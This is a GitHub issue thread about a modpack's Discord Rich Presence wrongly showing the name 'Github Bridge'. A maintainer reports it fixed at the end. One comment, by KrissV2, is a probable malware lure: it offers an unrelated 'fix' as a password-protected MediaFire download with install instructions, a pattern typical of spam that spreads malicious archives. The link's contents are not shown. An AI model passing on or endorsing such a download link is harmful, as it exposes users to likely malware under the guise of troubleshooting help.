### ISSUE TITLE
Discord Rich Presence is named "Github Bridge"

### ISSUE THREAD

**Issue by OvercastWarmth** [game-design-driven/Create-Prepare-to-Dye#604]
Not a major pack issue, but I've had people ask what "Github Bridge" is on three occasions now and it's somewhat annoying.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Yarden-zamir** [comment]
Might have fixed it now

**Comment by Yarden-zamir** [comment]
Fixed
